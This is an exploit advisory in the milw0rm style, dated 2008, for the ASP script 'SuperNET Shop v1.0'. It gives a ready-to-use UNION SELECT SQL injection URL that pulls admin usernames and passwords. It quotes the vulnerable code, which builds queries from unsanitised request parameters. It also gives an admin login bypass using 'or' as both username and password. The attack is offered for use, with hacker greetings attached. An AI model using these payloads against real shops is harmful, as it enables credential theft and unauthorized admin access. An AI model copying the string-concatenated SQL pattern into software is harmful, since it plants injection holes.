-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_
SuperNET Shop v1.0 Remote SQL Ä°njection Vulnerability
Discovered By : U238 (ugur238)
webpage : ugur238.org (the end)
mail : setuid.noexec0x1@hotmail.com
>From : Turkey - Erzincan
Script : http://www.aspindir.com/indir.asp?ID=2
Script (alternativ) : http://rapidshare.de/files/39062184/supershop.zip.html
-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-
Exploit:
localhost:2222/lab/shop/secure/admin/guncelle.asp?id=1+union+select+0,KullaniciAdi,2,sifre,4,5,6,7,8,9+from+admin
Error File : guncelle.asp
Error Code :
line - id = Request.QueryString("id")
line - SQL_L = "Select * from products WHERE id =" &id
Admin Panel : target/secure/admin
-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-
Admin Panel Bypass Exploit :
Error File :
giris.asp
Error Code :
Sorgu="select * from admin where KullaniciAdi = '" & request.form("kulad") & "' and Sifre = '" & Request.form("sifre") & "'"
Rs.Open Sorgu, Baglanti, 1, 3
------------------------
secure/admin/default.asp
username : 'or'
password : 'or'
Ye34h lets see you now admin panell ; )
*/ Greatz : The_BekiR - ZeberuS - ka0x - nettoxic - fahn - str0ke
MUSTAFA KEMAL ATATURK - ATAM Ä°ZÄ°NDEYIZ
/*
# milw0rm.com [2008-04-08]